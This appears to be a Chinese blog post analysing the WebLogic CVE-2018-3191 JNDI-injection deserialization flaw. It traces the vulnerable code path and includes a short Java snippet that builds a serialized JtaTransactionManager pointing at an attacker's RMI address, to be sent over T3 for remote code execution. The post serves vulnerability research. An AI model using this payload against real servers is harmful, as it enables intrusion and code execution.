weblogic之CVE-2018-3191漏洞分析

weblogic之CVE-2018-3191漏洞分析

理解这个漏洞首先需要看这篇文章:https://www.cnblogs.com/afanti/p/10193169.html

引用廖新喜说的,说白的就是反序列化时lookup中的参数可控,导致 JNDI注入

AbstractPlatformTransactionManager这个黑名单就是用于防止Spring JNDI注入,从官方以前的黑名单上就能看到org.springframework.transaction.support.AbstractPlatformTransactionManager,但是官方没有想到在com.bea.core.repackaged的相关包还有spring的相关类。其实这两个包中的类实现几乎一样,只是来源于不同的包。

看下利用过程:

生成poc.

weblogic之CVE-2018-3191漏洞分析

服务器开启jndi服务,ExportObject.java恶意类就是弹个计算器

weblogic之CVE-2018-3191漏洞分析

通过T3协议发送数据包,服务器向jndi请求恶意类,反序列化导致RCE:

weblogic之CVE-2018-3191漏洞分析

跟一下漏洞过程:

来到com.bea.core.repackaged.springframework.transaction.jta.JtaTransactionManager类的initUserTransactionAndTransactionManager方法,this.userTransactionName属性被赋值为恶意rmi地址,跟进164行:

weblogic之CVE-2018-3191漏洞分析

跟进lookup方法

weblogic之CVE-2018-3191漏洞分析

weblogic之CVE-2018-3191漏洞分析

最后看一下poc生成过程:

导入所用到的com.bea.core.repackaged.springframework.spring_1.2.0.0_2-5-3.jar包和com.bea.core.repackaged.apache.commons.logging_1.2.1.jar包,将UserTransactionName参数注入恶意类地址。

		String test;
System.out.println("hahha"); test = "rmi://192.168.20.112:2222/aa";
JtaTransactionManager jtaTransactionManager = new JtaTransactionManager();
jtaTransactionManager.setUserTransactionName(test);
File f = new File("E:\\Struts2-Vulenv-master\\ysoserial\\src\\main\\java\\ysoserial\\obj.txt");
ObjectOutputStream out1 = new ObjectOutputStream(new FileOutputStream(f));
out1.writeObject(jtaTransactionManager);
out1.flush();
out1.close();

weblogic之CVE-2018-3191漏洞分析

参考链接:

https://paper.tuisec.win/detail/a312d98e0285e24

https://github.com/pyn3rd/CVE-2018-3191

https://paper.seebug.org/718/

上一篇:使用cocos创建的项目,如何进行源码调试?


下一篇:c++之初级的消息队列及线程池模型